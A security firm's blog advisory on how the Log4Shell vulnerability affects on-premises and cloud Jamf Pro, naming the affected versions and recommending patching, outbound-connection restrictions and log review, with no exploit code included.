Randori and IBM Plan to Join Forces to Tackle Growing Attack Surface Risks

December 11, 2021

Jamf Pro: Log4Shell Impact & Remediations

By: Randori Attack Team

Share on facebook
Share on twitter
Share on linkedin

Update Regarding Exploitability of JAMF Pro: 

Last Update: 3:22pm EST, Dec. 11, 2021

Following the acknowledgement of products affected by Log4j, Randori can confirm the exploitability of Jamf Pro (security notice) via the Log4j CVE-2021-44228 also known as “Log4Shell.” Recent unpatched versions of Jamf Pro, including those running on Java 11, are not and should not be considered protected against this exploitation. Due to the severity of impact from the exploit (RCE) and the widespread use of this Java library, Randori recommends this vulnerability be addressed immediately. 

Randori’s Attack Team has validated exploitability with working exploits that achieve code execution via unauthenticated network vectors specifically on Jamf Pro and anticipates widespread exploitation by threat actors imminently. Randori does not release proof-of-concept code. These exploits include 10.34.0 on Java 11.

Based on our experience exploiting this vulnerability, we suggest organizations running Jamf Pro on-premises take the following steps to reduce their risks at this time:

  • Review guidance provided by JAMF. Specifically, upgrade to 10.34.1 or later.

Randori’s Attack Team has confirmed that current exploitation techniques do not affect Jamf version 10.34.1.

Randori has observed cloud-hosted Jamf Pro instances reporting version numbers consistent with exploitability, but Jamf has reported that cloud-hosted instances are mitigated. Randori’s Attack Team has not independently verified the efficacy or extent of mitigations, and recommends treating any Jamf  Pro instance prior to 10.34.1 as exploitable.

Situation Report: Jamf Impact from Log4Shell

A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j 2 library was disclosed publicly via the project’s GitHub on December 9, 2021. This vulnerability, impacts multiple Jamf products. The Randori Attack Team can confirm exploitability of Jamf products in live environments via Log4j (CVE-2021-44228) aka “Log4Shell”. 

This is a critical vulnerability and impacted organizations should take immediate action. This post will be regularly updated, but follow @RandoriAttack for immediate updates. 

Impact

The Log4j 2 library is very frequently used in enterprise Java software. Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come. Randori has validated exploitability with a working exploit, and anticipates widespread exploitation by threat actors imminently. Randori has been in contact with the Jamf team to assist their development of mitigations

Impacted products:

  • Jamf Pro (on-prem)
    • Versions up to and including 10.34.0 are remotely exploitable, including those running on Java 11.
  • Jamf Pro (cloud)
    • Jamf asserts these instances have been mitigated. This claim has not been validated by Randori.

Remediations & Recommendations

If running a vulnerable version of Jamf Pro, Randori recommends organizations take immediate action and do the following: 

  • Implement default-deny for outbound network connections initiated by the Jamf server.
  • Patch. 
  • Assume compromise and review logs for signs of malicious activity.
  • Monitor our Log4Shell Attacker Note for impact of Log4Shell beyond Jamf
  • Follow @RandoriAttack for updates.

If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.

Additional Log4j Research from Randori

Gain an Attacker's Perspective

Uncover your true attack surface with the only ASM platform built by attackers. Stay one step ahead of cyber-criminals, hacktivists and nation-state attackers, by seeing your perimeter as they see it.